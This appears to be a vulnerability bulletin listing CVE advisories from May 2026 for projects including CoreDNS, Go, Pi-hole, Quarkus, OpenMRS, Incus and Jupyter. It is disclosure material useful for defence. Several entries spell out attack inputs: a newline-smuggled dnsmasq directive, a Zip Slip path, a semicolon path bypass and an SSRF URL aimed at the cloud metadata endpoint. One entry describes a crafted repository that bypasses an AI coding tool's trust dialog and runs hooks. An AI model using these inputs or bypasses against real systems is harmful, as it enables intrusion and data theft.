| coredns--coredns | CoreDNS is a DNS server written in Go. In versions prior to 1.14.3, the gRPC, QUIC, DoH, and DoH3 transport implementations incorrectly handle TSIG authentication. For gRPC and QUIC, the server checks whether the TSIG key name exists in the configuration but never calls dns.TsigVerify() to validate the HMAC. If the key name matches a configured key, the tsigStatus field remains nil and the tsig plugin treats the request as successfully authenticated regardless of the MAC value. For DoH and DoH3, the issue is more severe: the DoHWriter.TsigStatus() method unconditionally returns nil, and the server never inspects the TSIG record at all. Any request containing a TSIG record is treated as authenticated over DoH and DoH3, even if the key name is invalid and the MAC is arbitrary. An unauthenticated network attacker can exploit this to bypass TSIG-protected functionality such as AXFR/IXFR zone transfers, dynamic DNS updates, or other TSIG-gated plugin behavior. The DoH and DoH3 variants have a lower exploitation bar because the attacker does not need to know a valid TSIG key name. This issue has been fixed in version 1.14.3. As a workaround, disable gRPC, QUIC, DoH, and DoH3 listeners where TSIG authentication is required, or restrict network-level access to affected transport ports to trusted sources only. | 2026-05-05 | not yet calculated | CVE-2026-35579 | https://github.com/coredns/coredns/security/advisories/GHSA-vp29-5652-4fw9 |
| n/a--Webkul Krayin CRM v2.1.5 | Cross-Site Scripting (XSS) vulnerability exists in Webkul Krayin CRM v2.1.5. The application fails to sanitize user-supplied input in the comment field during Activity creation on the /admin/activities/create endpoint | 2026-05-07 | not yet calculated | CVE-2026-36341 | https://github.com/krayin/laravel-crm/releases/tag/v2.1.6 https://github.com/krayin/laravel-crm/pull/2401 https://drive.google.com/file/d/1Y_WjD4Tiq_z7zQUlddFCFMDoyyN300r9/view https://cyber.spool.co.jp/vulnerabilities/cve-2026-36341/ https://github.com/cybercrewinc/CVE-2026-36341 |
| www[.]Realtek[.]com--Realtek rtl819x Jungle SDK | The rtl8192cd Wi-Fi kernel driver in the Realtek rtl819x Jungle SDK (all known versions through v3.4.14B) does not perform any access control checks on the write_mem (ioctl 0x89F5) and read_mem (ioctl 0x89F6) debug handlers, which are compiled into production builds via the unconditionally defined _IOCTL_DEBUG_CMD_ macro in 8192cd_cfg.h | 2026-05-05 | not yet calculated | CVE-2026-36355 | http://realtek.com https://github.com/totekuh/CVE-2026-36355 |
| https://en[.]meigsmart[.]com-- MeiG Smart FORGE_SLT711 devices | The GoAhead web server on MeiG Smart FORGE_SLT711 devices (firmware MDM9607.LE.1.0-00110-STD.PROD-1) allows unauthenticated OS command injection via the /action/SetRemoteAccessCfg endpoint. | 2026-05-05 | not yet calculated | CVE-2026-36356 | http://forgeslt711.com http://meig.com https://github.com/totekuh/CVE-2026-36356 |
| n/a--Juzaweb CMS v.5.0.0 | Cross Site Scripting vulnerability in Juzaweb CMS v.5.0.0 allows a remote attacker via execute arbitrary code via a crafted script to the Add Banner Ads function | 2026-05-06 | not yet calculated | CVE-2026-36358 | https://juzaweb.com/ http://juzaweb.com https://gist.github.com/yuhuamiao/2c984b2d7f2adb90020818f9308b5862 |
| n/a--Lymphatus caesium-image-compressor | An issue in Lymphatus caesium-image-compressor All versions up to and including commit 02da2c6 allows a local attacker to execute arbitrary code via the shutdownMachine and putMachineToSleep functions in PostCompressionActions.cpp | 2026-05-04 | not yet calculated | CVE-2026-36365 | https://github.com/Lymphatus/caesium-image-compressor https://github.com/Lymphatus/caesium-image-compressor/blob/main/src/utils/PostCompressionActions.cpp https://github.com/Lymphatus/caesium-image-compressor/pull/376 https://github.com/mertsatilmaz/vulnerability-research/blob/main/advisories/CVE-2026-36365.md |
| codeastro[.]com-- CODEASTRO MMS v1.0 | A Remote Code Execution vulnerability was found in CODEASTRO Membership Management System v1.0 in /add_members.php. This vulnerability affects the file upload functionality, where improper file sanitization allows attackers to inject malicious files which leads RCE. | 2026-05-07 | not yet calculated | CVE-2026-36387 | http://codeastro.com https://github.com/raneishajustin/CVE/tree/main/CVE-2026-36387 |
| n/a--PHPGurukal Hospital Management System v4.0 | A Cross-Site Scripting (XSS) vulnerability was found in PHPGurukal Hospital Management System v4.0 in the /hospital/hms/edit-profile.php page. This flaw allows an authenticated attacker (patient) to inject a malicious script payload into the User Name parameter, which is stored in the application and later rendered in the doctor s interface. | 2026-05-07 | not yet calculated | CVE-2026-36388 | http://phpgurukal.com https://github.com/raneishajustin/CVE/tree/main/CVE-2026-36388 |
| n/a--ChestnutCMS v1.5.10 | ChestnutCMS v1.5.10 has a SQL injection vulnerability. The content parameter of the cms_content tag can be manipulated in the admin backend and injected into a SQL query when the template is rendered. | 2026-05-07 | not yet calculated | CVE-2026-36458 | https://github.com/liweiyi/ChestnutCMS.git https://github.com/errors11/CVE/blob/main/CVE-2026-36458.md |
| n/a--Beauty Parlour Management System v1.1 | Beauty Parlour Management System v1.1 was discovered to contain a SQL injection vulnerability via the aptnumber parameter in the /appointment-detail.php endpoint. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement. | 2026-05-08 | not yet calculated | CVE-2026-37431 | https://github.com/Y4y17/CVE/blob/main/Beauty%20Parlour%20Management%20System/SQL%20Injection-2.md |
| n/a--FRRouting (FRR) | Missing input validation in the MP_REACH_NLRI component of FRRouting (FRR) stable/10.0 to stable/10.6 allows authenticated attackers to cause a Denial of Service (DoS) via supplying a crafted UPDATE message. | 2026-05-04 | not yet calculated | CVE-2026-37458 | https://github.com/FRRouting/frr/commit/8102a8aeceb9f86fdfe1f80cd77080522bab69c8 https://github.com/mertsatilmaz/vulnerability-research/blob/main/advisories/CVE-2026-36365.md |
| n/a--FRRouting (FRR) | An integer underflow in FRRouting (FRR) stable/10.0 to stable/10.6 allows attackers to cause a Denial of Service (DoS) via supplying a crafted BGP UPDATE message. | 2026-05-04 | not yet calculated | CVE-2026-37459 | https://github.com/FRRouting/frr/commit/693a2e02687cdc9d16501275e05136edea9650d9 |
| n/a--ParseIP6Extended | An out-of-bounds read in the ParseIP6Extended function (/bgp/bgp.go) of gobgp v4.3.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted BGP UPDATE message. | 2026-05-04 | not yet calculated | CVE-2026-37461 | https://github.com/osrg/gobgp/blob/v4.3.0/pkg/packet/bgp/bgp.go https://github.com/osrg/gobgp/commit/362cce3e325f56e7a4f792ccb9689b3bdda9e682 https://github.com/osrg/gobgp/commit/9ce8936672ebc07df524da77fa4c6ae26d92be6d |
| grok[.]com-- grokability snipe-it v.8.4.0 | Insecure Permissions vulnerability in grokability snipe-it v.8.4.0 and before and fixed after 2026-03-10 commit 676a9958 allows a remote attacker to execute arbitrary code via the app/Http/Controllers/Api/UploadedFilesController.php component | 2026-05-07 | not yet calculated | CVE-2026-37709 | https://github.com/grokability/snipe-it/commit/676a9958895a77de340565e7a0b17ae744664904 https://github.com/grokability/snipe-it/security/advisories/GHSA-xg82-2hrv-hf64 |
| n/a--fohrloop dash-uploader v.0.1.0 | Directory Traversal vulnerability in fohrloop dash-uploader v.0.1.0 through v.0.7.0a2 allows a remote attacker to execute arbitrary code via the dash_uploader/httprequesthandler.py, aseHttpRequestHandler.get_temp_root(), BaseHttpRequestHandler._post() components | 2026-05-08 | not yet calculated | CVE-2026-38360 | https://github.com/fohrloop/dash-uploader https://pypi.org/project/dash-uploader/ https://github.com/fohrloop/dash-uploader/blob/stable/dash_uploader/httprequesthandler.py https://github.com/fohrloop/dash-uploader/blob/dev/dash_uploader/httprequesthandler.py https://github.com/fohrloop/dash-uploader/issues/153 https://github.com/a1ohadance/CVE-2026-38360 |
| n/a--fohrloop dash-uploader v.0.1.0 | An issue in fohrloop dash-uploader v.0.1.0 through v.0.7.0a2 allows a remote attacker to execute arbitrary code via the dash_uploader/httprequesthandler.py, dash_uploader/upload.py in the Upload function and max_file_size parameter, dash_uploader/configure_upload.py components | 2026-05-08 | not yet calculated | CVE-2026-38361 | https://github.com/fohrloop/dash-uploader https://pypi.org/project/dash-uploader/ https://github.com/fohrloop/dash-uploader/blob/stable/dash_uploader/httprequesthandler.py https://github.com/fohrloop/dash-uploader/issues/153 https://pypistats.org/packages/dash-uploader https://libraries.io/pypi/dash-uploader https://pepy.tech/project/dash-uploader https://docs.python.org/3/library/functions.html#all https://github.com/a1ohadance/CVE-2026-38361 |
| n/a--Kestra v1.3.3 | Kestra v1.3.3 and before is vulnerable to SQL Injection. The vulnerability occurs because user-controlled input from a GET parameter is directly concatenated into an SQL query without proper sanitization or parameterization. As a result, attackers can inject arbitrary SQL expressions into the database query. | 2026-05-05 | not yet calculated | CVE-2026-38428 | https://www.link.com https://github.com/kestra-io/kestra/security/advisories/GHSA-365w-2m69-mp9x |
| n/a--OpenCMS v20 | OpenCMS v20 and before is vulnerable to XML External Entity (XXE) in the Admin Import DB feature due to insecure XML parsing of user supplied .zip files containing a manifest.xml. | 2026-05-05 | not yet calculated | CVE-2026-38429 | https://github.com/alkacon/opencms-core/commit/e3e41e5a96d71383279e7d23c627efc9934008c1 |
| n/a--ERPNext v15.103.1 | ERPNext v15.103.1 and before is vulnerable to Server-Side Template Injection (SSTI). An attacker with permission to create or edit email templates can inject template expressions that are executed on the server when the template is rendered. | 2026-05-05 | not yet calculated | CVE-2026-38431 | https://c0wking.hashnode.dev/ssti-in-erpnext-frappe-email-template-engine |
| n/a--ERPNext v15.103.1 | ERPNext v15.103.1 and before is vulnerable to Cross Site Scripting (XSS) in the Email Template engine. An attacker with permission to create or edit email templates can inject malicious JavaScript code that are executed on the victim's browser when the template is applied. | 2026-05-05 | not yet calculated | CVE-2026-38432 | https://c0wking.hashnode.dev/stored-xss-in-erpnext-frappe-email-template-engine |
| n/a--wCMS v.1.4 | wCMS v.1.4 is vulnerable to Cross Site Scripting (XSS) when creating a new blog. | 2026-05-04 | not yet calculated | CVE-2026-38669 | https://github.com/thv930/yumeng_wu/tree/main/1/readme.md |
| n/a--OpenSTAManager version 2.10 | OpenSTAManager version 2.10 and earlier contains an arbitrary file upload vulnerability in the module update functionality (modules/aggiornamenti/upload_modules.php) | 2026-05-04 | not yet calculated | CVE-2026-38751 | https://github.com/devcode-it/openstamanager https://github.com/fuutianyii/poc |
| n/a--FluentCMS 1.2.3 | FluentCMS 1.2.3 is vulnerable to Cross Site Scripting (XSS) in TextHTML plugin. | 2026-05-05 | not yet calculated | CVE-2026-38947 | https://github.com/fluentcms/FluentCMS/issues/2405 |
| n/a--GPAC | Buffer Overflow vulnerability in GPAC before commit v391dc7f4d234988ea0bc3cc294eb725eddf8f702 allows an attacker to cause a denial of service via the src/scenegraph/svg_attributes.c, svg_parse_strings(), gf_svg_parse_attribute() | 2026-05-05 | not yet calculated | CVE-2026-39103 | https://github.com/gpac/gpac/issues/3506 https://github.com/gpac/gpac/commit/391dc7f4d234988ea0bc3cc294eb725eddf8f702 |
| gotenberg--gotenberg | Gotenberg is an API-based document conversion tool. In version 8.29.1, an unauthenticated attacker with network access can force the server to make outbound HTTP POST requests to arbitrary internal or external destinations by supplying a crafted URL in the Gotenberg-Webhook-Url request header. The FilterDeadline function in filter.go is intended to gate outbound URLs, but when both the allow-list and deny-list are empty (the default configuration), it returns nil unconditionally and permits any URL. This is a blind SSRF: Gotenberg POSTs the converted document to the webhook URL and only checks whether the response status code is an error, but never returns the target's response body to the attacker. An attacker can use this to probe internal network infrastructure by observing whether the error callback is invoked, force POST requests against internal services that perform side effects, and confirm reachability of cloud metadata endpoints. The retryable HTTP client issues up to 4 automatic retries per request, amplifying each probe. This issue has been fixed in version 8.31.0. As a workaround, configure the GOTENBERG_API_WEBHOOK_ALLOW_LIST environment variable to restrict webhook URLs to known receivers, or set GOTENBERG_API_WEBHOOK_DENY_LIST to block RFC-1918 and link-local address ranges. | 2026-05-05 | not yet calculated | CVE-2026-39383 | https://github.com/gotenberg/gotenberg/security/advisories/GHSA-5vh4-rgv7-p9g4 |
| lxc--lxc | lxc is a Linux container runtime. In the setuid helper lxc-user-nic, the delete path contains a logic flaw in the find_line() function that allows an unprivileged user to delete OVS-attached network interfaces belonging to other users. When lxc-user-nic delete scans its NIC database to authorize a deletion request, the interface name comparison can set the authorization flag based on a name match alone, even when the ownership, type, and link fields in that database entry belong to a different user. The vulnerable check sits after the goto next label handling, meaning it is reachable on lines where earlier ownership checks failed or were skipped. Because nothing downstream of this authorization signal re-verifies that the matched database line actually belongs to the caller, an unprivileged attacker with a valid lxc-usernet policy entry can trigger deletion of another user's OVS port on the same bridge. This is limited to multi-tenant environments using lxc-user-nic with OpenVSwitch bridges. The impact is denial of service - one tenant can repeatedly disconnect networking from containers run by another tenant on shared infrastructure. This is patched in version 7.0.0. | 2026-05-05 | not yet calculated | CVE-2026-39402 | https://github.com/lxc/lxc/security/advisories/GHSA-3m9j-g9gc-vcvq |
| Apache Software Foundation--Apache NiFi | The optional extension component TinkerpopClientService is missing the Restricted annotation with the Execute Code Required Permission in Apache NiFi 2.0.0-M1 through 2.8.0. The TinkerpopClientService supports configuration of ByteCode Submission for the Script Submission Type, enabling Groovy Script execution in the service prior to submitting the query. The missing Restricted annotation allows users without the Execute Code Permission to configure the Service in installations that use fine-grained authorization and have the optional TinkerpopClientService installed. Apache NiFi installations that do not have the nifi-other-graph-services-nar installed are not subject to this vulnerability. Upgrading to Apache NiFi 2.9.0 is the recommended mitigation. | 2026-05-08 | not yet calculated | CVE-2026-39816 | https://lists.apache.org/thread/gh9g7xwvv4l20gzff6q3367snf35ctcb |
| Go toolchain--cmd/go | The "go tool pack" subcommand (usually used only by the compiler as an internal tool with known-good inputs) does not sanitize output filenames. Extracting a malicious archive file with the "pack" subcommand can write files to arbitrary locations on the filesystem. | 2026-05-07 | not yet calculated | CVE-2026-39817 | https://go.dev/issue/78778 https://go.dev/cl/767520 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4979 |
| Go toolchain--cmd/go | The "go bug" command writes to two files with predictable names in the system temporary directory (for example, "/tmp"). An attacker with access to the temporary directory can create a symlink in one of these names, causing "go bug" to overwrite the target of the symlink. | 2026-05-07 | not yet calculated | CVE-2026-39819 | https://go.dev/issue/78584 https://go.dev/cl/763882 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4978 |
| Go standard library--net/mail | Well-crafted inputs reaching ParseAddress, ParseAddressList, and ParseDate were able to trigger excessive CPU exhaustion and memory allocations. | 2026-05-07 | not yet calculated | CVE-2026-39820 | https://go.dev/issue/78566 https://go.dev/cl/759940 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4986 |
| Go standard library--html/template | CVE-2026-27142 fixed a vulnerability in which URLs were not correctly escaped inside of a <meta> tag's <content> attribute. If the URL content were to insert ASCII whitespaces around the '=' rune inside of the <content> attribute, the escaper would fail to similarly escape it, leading to XSS. | 2026-05-07 | not yet calculated | CVE-2026-39823 | https://go.dev/issue/78913 https://go.dev/cl/769920 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4982 |
| Go standard library--net/http/httputil | ReverseProxy can forward queries containing parameters not visible to Rewrite functions. When used with a Rewrite function, or a Director function which parses query parameters, ReverseProxy sanitizes the forwarded request to remove query parameters which are not parsed by url.ParseQuery. ReverseProxy does not take ParseQuery's limit on the total number of query parameters (controlled by GODEBUG=urlmaxqueryparams=N) into account. This can permit ReverseProxy to forward a request containing a query parameter that is not visible to the Rewrite function. For example, the query "a1=x&a2=x&...&a10000=x&hidden=y" can forward the parameter "hidden=y" while hiding it from the proxy's Rewrite function. | 2026-05-07 | not yet calculated | CVE-2026-39825 | https://go.dev/cl/770541 https://go.dev/issue/78948 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4976 |
| Go standard library--html/template | If a trusted template author were to write a <script> tag containing an empty 'type' attribute or a 'type' attribute with an ASCII whitespace, the execution of the template would incorrectly escape any data passed into the <script> block. | 2026-05-07 | not yet calculated | CVE-2026-39826 | https://go.dev/issue/78981 https://go.dev/cl/771180 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4980 |
| Go standard library--net | The Dial and LookupPort functions panic on Windows when provided with an input containing a NUL (0). | 2026-05-07 | not yet calculated | CVE-2026-39836 | https://go.dev/issue/79006 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://go.dev/cl/775320 https://pkg.go.dev/vuln/GO-2026-4971 |
| pi-hole--FTL | Pi-hole FTL is the core engine of the Pi-hole network-level advertisement and tracker blocker. In versions before 6.6.1, the `dns.interface` configuration field in Pi-hole FTL accepted newline characters without validation, allowing an attacker to inject arbitrary directives into the generated dnsmasq configuration file. On installations with no admin password set (the default for many deployments), the configuration API is fully accessible without credentials, allowing a network-adjacent attacker to inject the payload, enable the built-in DHCP server, and achieve arbitrary command execution on the host the next time any device on the network requests a DHCP lease. The injected value is persisted to /etc/pihole/pihole.toml and survives restarts. The strncpy in the code path limits the total interface field to 31 bytes, but payloads such as wlan0\ndhcp-script=/tmp/p fit within this constraint. The dnsmasq config validation introduced in FTL 6.6 only checks syntactic validity, so valid directives injected via newline pass validation successfully. This issue has been fixed in version 6.6.1. | 2026-05-05 | not yet calculated | CVE-2026-39849 | https://github.com/pi-hole/FTL/security/advisories/GHSA-9cqv-839p-gpq2 https://github.com/pi-hole/FTL/commit/0c46e4ec7fe57f762fce261625f2cf5d43806e6d https://github.com/pi-hole/FTL/releases/tag/v6.6.1 |
| quarkusio--quarkus | Quarkus is a Java framework for building cloud-native applications. In versions prior to 3.20.6.1, 3.27.3.1, 3.33.1.1, 3.35.1.1, 3.34.7, and 3.35.2, a path normalization inconsistency between the security layer and the routing layer allows unauthenticated or lower-privileged users to bypass HTTP path-based authorization policies. Quarkus's security layer performs authorization checks on the raw URL path which preserves matrix parameters (semicolons), while RESTEasy Reactive's routing layer strips matrix parameters before matching endpoints. An attacker can append a semicolon and arbitrary text to a request URL (e.g., /api/admin;anything) to bypass policies protecting /api/admin while still routing to the protected endpoint. This issue has been fixed in versions 3.20.6.1, 3.27.3.1, 3.33.1.1, 3.35.1.1, 3.34.7, and 3.35.2. | 2026-05-05 | not yet calculated | CVE-2026-39852 | https://github.com/quarkusio/quarkus/security/advisories/GHSA-rc95-pcm8-65v9 |
| Apache Software Foundation--Apache Wicket | Missing invocation of Servlet http web request method changeSessionId after session binding can be exploited for a session fixation attack in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, 9.0.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue. | 2026-05-06 | not yet calculated | CVE-2026-40010 | https://lists.apache.org/thread/61wsc0xdtfd5oozojfx7by9w3jwgkmv1 |
| anthropics--claude-code | In versions 2.1.63 through 2.1.83 of Claude Code, the folder trust determination logic used the git worktree commondir file without validating its contents. An attacker could craft a malicious repository with a commondir file pointing to a path the victim had previously trusted, causing Claude Code to bypass its trust confirmation dialog and immediately execute hooks defined in `.claude/settings.json`. Exploitation requires the victim to clone the malicious repository and run Claude Code within it, and the attacker must know or guess a path the victim had already trusted. This issue has been fixed in version 2.1.84. | 2026-05-05 | not yet calculated | CVE-2026-40068 | https://github.com/anthropics/claude-code/security/advisories/GHSA-q5hj-mxqh-vv77 |
| openmrs--openmrs-core | OpenMRS Core is an open source electronic medical record system platform. In versions 2.7.8 and earlier and versions 2.8.0 through 2.8.5, the `/openmrs/moduleResources/{moduleid}` endpoint is vulnerable to a path traversal attack. The ModuleResourcesServlet constructs a filesystem path from user-controlled input without performing path boundary validation - the getFile() method concatenates the user-supplied path into an absolute filesystem path without calling normalize() or checking that the result stays within the allowed module resources directory. Because this endpoint serves static resources required for rendering the login page, it is not protected by authentication filters, allowing unauthenticated exploitation. An attacker can traverse directories and read arbitrary files from the server filesystem, including /etc/passwd and application configuration files containing database credentials. Successful exploitation requires the target deployment to run on Apache Tomcat versions prior to 8.5.31, where the ..; path parameter bypass is not mitigated by the container. Deployments on Tomcat 8.5.31 or later and Tomcat 9.0.10 or later are protected at the container level, though the underlying code defect remains. This issue has been fixed in versions after 2.7.8 (within the 2.7.x branch) and in version 2.8.6 and later. | 2026-05-05 | not yet calculated | CVE-2026-40075 | https://github.com/openmrs/openmrs-core/security/advisories/GHSA-jjgj-cx3q-pw4w |
| openmrs--openmrs-core | OpenMRS Core is an open source electronic medical record system platform. In versions 2.7.8 and earlier and versions 2.8.0 through 2.8.5, the module upload endpoint at POST `/openmrs/ws/rest/v1/module` is vulnerable to a Zip Slip path traversal attack. During automatic extraction of uploaded .omod archives in `WebModuleUtil.startModule()`, ZIP entries under web/module/ are checked only to see whether the full entry path starts with `..,` and the remaining path is then concatenated into the destination path without normalization or a boundary check. A crafted archive can therefore include entries such as `web/module/../../../../malicious.jsp` and cause files to be written outside the intended module directory. An authenticated attacker with module upload access can write arbitrary files to locations such as the web application root and achieve remote code execution by uploading a JSP file and then requesting it. The issue is compounded by the fact that the module.allow_web_admin runtime property is enforced in the legacy UI controller but not in the REST API upload path, so deployments relying on that property to block web-based module administration remain exposed through the REST endpoint. This issue has been fixed in versions after 2.7.8 in the 2.7.x line and in version 2.8.6 and later. | 2026-05-06 | not yet calculated | CVE-2026-40076 | https://github.com/openmrs/openmrs-core/security/advisories/GHSA-78fc-9688-w8xw |
| jupyter-server--jupyter_server | Jupyter Server is the backend for Jupyter web applications. In versions 2.17.0 and earlier, the Origin header validation uses Python's re.match() to check incoming origins against the allow_origin_pat configuration value. Because re.match() only anchors at the start of the string and does not require a full match, a pattern intended to match only a trusted domain (e.g., trusted.example.com) will also match any origin that begins with that domain followed by additional characters (e.g., trusted.example.com.evil.com). An attacker who controls such a domain can bypass the CORS origin restriction and make cross-origin requests to the Jupyter Server API from an untrusted site. This issue has been fixed in version 2.18.0. | 2026-05-05 | not yet calculated | CVE-2026-40110 | https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-24qx-w28j-9m6p https://github.com/jupyter-server/jupyter_server/pull/603 https://github.com/jupyter-server/jupyter_server/commit/057869a327c46730afede3eab0ca2d2e3e74acea https://github.com/jupyter-server/jupyter_server/commit/49b34392feaa97735b3b777e3baf8f22f2a14ed8 |
| jupyter--notebook | In Jupyter Notebook versions 7.0.0 through 7.5.5, JupyterLab versions 4.5.6 and earlier, and the corresponding @jupyter-notebook/help-extension and @jupyterlab/help-extension packages before 7.5.6 and 4.5.7, a stored cross-site scripting issue in the help command linker can be chained with attacker-controlled notebook content to steal authentication tokens with a single click. An attacker can craft a malicious notebook file containing elements that appear indistinguishable from legitimate controls and trigger execution when a user interacts with them. Successful exploitation allows theft of the user's authentication token and complete takeover of the Jupyter session through the REST API, including reading files, creating or modifying files, accessing kernels to execute arbitrary code, and creating terminals for shell access. This issue has been fixed in Notebook 7.5.6, JupyterLab 4.5.7, @jupyter-notebook/help-extension 7.5.6, and @jupyterlab/help-extension 4.5.7. As a workaround, disable the affected help extensions or set allowCommandLinker to false in the sanitizer configuration. | 2026-05-06 | not yet calculated | CVE-2026-40171 | https://github.com/jupyter/notebook/security/advisories/GHSA-rch3-82jr-f9w9 |
| MasaCMS--MasaCMS | Masa CMS is a content management system forked from Mura CMS. In versions 7.5.2 and earlier, the cUsers.updateAddress function does not properly validate anti-CSRF tokens for user address management operations. An attacker can induce a logged-in administrator to submit a forged request that adds, modifies, or deletes user address records, including email addresses and phone numbers. This can be used to alter contact information, redirect organizational communications, and corrupt address data in the user directory. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, restrict access to the administrative backend, use browser isolation for administrative sessions, or deploy filtering rules to block forged requests to the affected endpoint | 2026-05-06 | not yet calculated | CVE-2026-40174 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-572m-p246-4356 |
| lxc--incus | Incus is a system container and virtual machine manager. In versions before 7.0.0, missing validation logic in the storage bucket import logic allows an authenticated user with access to the storage bucket feature to cause the Incus daemon to crash. The vulnerability is present in the backup metadata handling logic, where the daemon processes the index.yaml file from an imported archive and accesses members of the parsed backup configuration without first verifying that the configuration object was initialized. A malicious or malformed index.yaml that omits the config block causes a nil-pointer dereference during bucket import operations and terminates the daemon. Repeated use of this issue can be used to keep Incus offline, causing a denial of service. This issue is fixed in version 7.0.0. | 2026-05-06 | not yet calculated | CVE-2026-40195 | https://github.com/lxc/incus/security/advisories/GHSA-gc7j-g665-rxr9 |
| lxc--incus | Incus is a system container and virtual machine manager. In versions before 7.0.0, missing validation logic in the storage volume import logic allows an authenticated user with access to the storage volume feature to cause the Incus daemon to crash. The custom volume backup import subsystem contains a nil-pointer dereference vulnerability during import operations. In the snapshot import loop, the daemon iterates over entries from `srcBackup.Config.VolumeSnapshots` and assumes that each slice element is initialized, then dereferences fields such as `Name`, `Config`, `Description`, `CreatedAt`, and `ExpiresAt` without first validating the element itself. Because the yaml unmarshaler accepts explicit null array elements from an attacker-controlled index.yaml and converts them into nil pointers inside the slice, an attacker can supply a backup archive containing a null entry in the volume_snapshots array. This causes a nil-pointer dereference during custom volume import and terminates the daemon, resulting in denial of service on the affected node. Repeated use of this issue can be used to keep Incus offline, causing a denial of service. This issue is fixed in version 7.0.0. | 2026-05-06 | not yet calculated | CVE-2026-40197 | https://github.com/lxc/incus/security/advisories/GHSA-r7w7-mmxr-47r9 |
| lxc--incus | Incus is a system container and virtual machine manager. In versions before 7.0.0, broken TLS validation logic in the OVN database connection logic can allow connections to an attacker's OVN database. The OVN client implementations disable Go standard TLS server verification and replace it with custom peer-certificate verification logic. That replacement verifier does not anchor trust in the configured CA certificate. Instead, it constructs the verification root set from certificates supplied by the peer during the handshake, so the configured CA is parsed but not used as the trust anchor for the final verification decision. In OVN-enabled deployments that use these SSL database connection paths, an attacker able to impersonate or intercept the OVN endpoint on the management network can present a rogue self-signed certificate chain, and Incus will accept this certificate as valid. This issue defeats the intended CA-based trust model for OVN database connections and permits endpoint impersonation by an active attacker in a suitable network position. This issue is fixed in version 7.0.0. | 2026-05-06 | not yet calculated | CVE-2026-40243 | https://github.com/lxc/incus/security/advisories/GHSA-c839-4qxr-j4x3 https://github.com/lxc/incus/blob/v6.22.0/internal/server/network/ovn/ovn_icnb.go https://github.com/lxc/incus/blob/v6.22.0/internal/server/network/ovn/ovn_icsb.go https://github.com/lxc/incus/blob/v6.22.0/internal/server/network/ovn/ovn_nb.go https://github.com/lxc/incus/blob/v6.22.0/internal/server/network/ovn/ovn_sb.go |
| lxc--incus | Incus is a system container and virtual machine manager. In versions before 7.0.0, missing validation logic in the storage volume import logic allows an authenticated user with access to the storage volume feature to cause the Incus daemon to crash. The backup restore subsystem contains an out-of-bounds panic vulnerability caused by an invalid bounds check when indexing snapshot metadata arrays, and the same flawed pattern also appears in the migration path. When iterating through physical snapshots provided in a backup archive, the loop uses the index to look up corresponding metadata in the parsed `Config.Snapshots` and `Config.VolumeSnapshots` slices. The guard condition `len(slice) >= i-1` is incorrect because it can still evaluate to true when the subsequent slice[i] access is out of bounds. An attacker can submit a backup archive that contains physical snapshot directories while supplying a tampered `index.yaml` with an empty or truncated snapshot metadata array, causing the daemon to index beyond the end of the metadata slice and crash. Repeated use of this issue can be used to keep Incus offline, causing a denial of service. This issue is fixed in version 7.0.0. | 2026-05-06 | not yet calculated | CVE-2026-40251 | https://github.com/lxc/incus/security/advisories/GHSA-4m88-wxj4-9qj6 https://github.com/lxc/incus/blob/v6.22.0/internal/server/storage/backend.go |
| gotenberg--gotenberg | Gotenberg is an API-based document conversion tool. In versions 8.30.1 and earlier, the default private-IP deny-lists for the --webhook-deny-list and --api-download-from-deny-list flags use a case-sensitive regular expression (^https?://) to match URL schemes. Because Go's net/url.Parse() normalizes the scheme to lowercase before establishing the outbound TCP connection, an attacker can bypass the deny-list by simply capitalizing part of the URL scheme (e.g., HTTP://, HTTPS://, or Http://). This allows unauthenticated requests to reach internal network services, including private IP ranges, loopback addresses, and cloud instance metadata endpoints such as HTTP://169.254.169.254/latest/meta-data/. This bypasses the same security control that was patched in CVE-2026-27018. This issue has been fixed in version 8.31.0. | 2026-05-05 | not yet calculated | CVE-2026-40280 | https://github.com/gotenberg/gotenberg/security/advisories/GHSA-5q7p-7jgv-ww56 https://github.com/gotenberg/gotenberg/commit/3f01ca18d3cc21375a1e2da4b5a3f261c8548e47 https://github.com/advisories/GHSA-jjwv-57xh-xr6r |
| MasaCMS--MasaCMS | Masa CMS is a content management system forked from Mura CMS. In versions 7.5.2 and earlier, the cTrash.empty function does not validate anti-CSRF tokens for trash management requests. An attacker can induce a logged-in administrator to submit a forged request that empties the trash and permanently deletes all deleted content. This can cause irreversible data loss and disrupt recovery of content intended for restoration. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, restrict access to the administrative backend, use browser isolation for administrative sessions, and maintain current database backups to recover from unauthorized deletion. | 2026-05-06 | not yet calculated | CVE-2026-40309 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-9f35-q62j-vm5j |
| MasaCMS--MasaCMS | Masa CMS is a content management system forked from Mura CMS. In versions 7.5.2 and earlier, the `cTrash.restore` function does not properly validate anti-CSRF tokens for content restoration requests. An attacker can trick a logged-in administrator to submit a forged request that restores deleted items from the trash and places them at an attacker-controlled location in the site structure through the parentid parameter. This can restore previously deleted malicious or outdated content, expose sensitive documents by moving them into publicly accessible locations, and disrupt site structure or content integrity. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, restrict access to the administrative backend, use browser isolation for administrative sessions, and regularly empty the trash to reduce the amount of content available for unauthorized restoration. | 2026-05-06 | not yet calculated | CVE-2026-40325 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-3mpf-gq73-crxf |
